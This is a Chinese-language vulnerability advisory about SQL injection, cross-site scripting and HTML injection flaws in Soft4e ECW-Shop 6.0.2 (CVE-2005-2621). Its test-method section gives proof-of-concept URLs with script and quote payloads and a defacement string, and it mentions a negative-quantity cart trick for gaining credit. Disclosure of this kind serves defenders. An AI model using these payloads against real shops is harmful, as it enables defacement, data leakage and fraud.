安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
ECW Shop index.php远程SQL注入漏洞
发布日期:
2005-08-17
更新日期:
2005-08-17
受影响系统:
Soft4e ECW-Shop 6.0.2
描述:
BUGTRAQ ID:
14576
CVE(CAN) ID:
CVE-2005-2621
ECW-Shop是一款电子商务购物系统,允许在数据库中使用Excel或Access格式。
ECW Shop中存在多个SQL注入漏洞,远程攻击者可以利用这些漏洞导致跨站脚本、信息泄漏、HTML注入等多种攻击。
起因是没有正确的过滤用户输入。
<*来源:John Cobb (
johnc@nobytes.com
)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=112421209919985&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
跨站脚本:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script>
信息泄漏和可能的SQL注入:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='
Error:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/search.php on line 109
HTML注入:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&id=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&max=1
购物车/订单控制:
可以向购物车中添加负值获得信用.
建议:
厂商补丁:
Soft4e
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.soft4e.com/shop.html
浏览次数:
3977
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客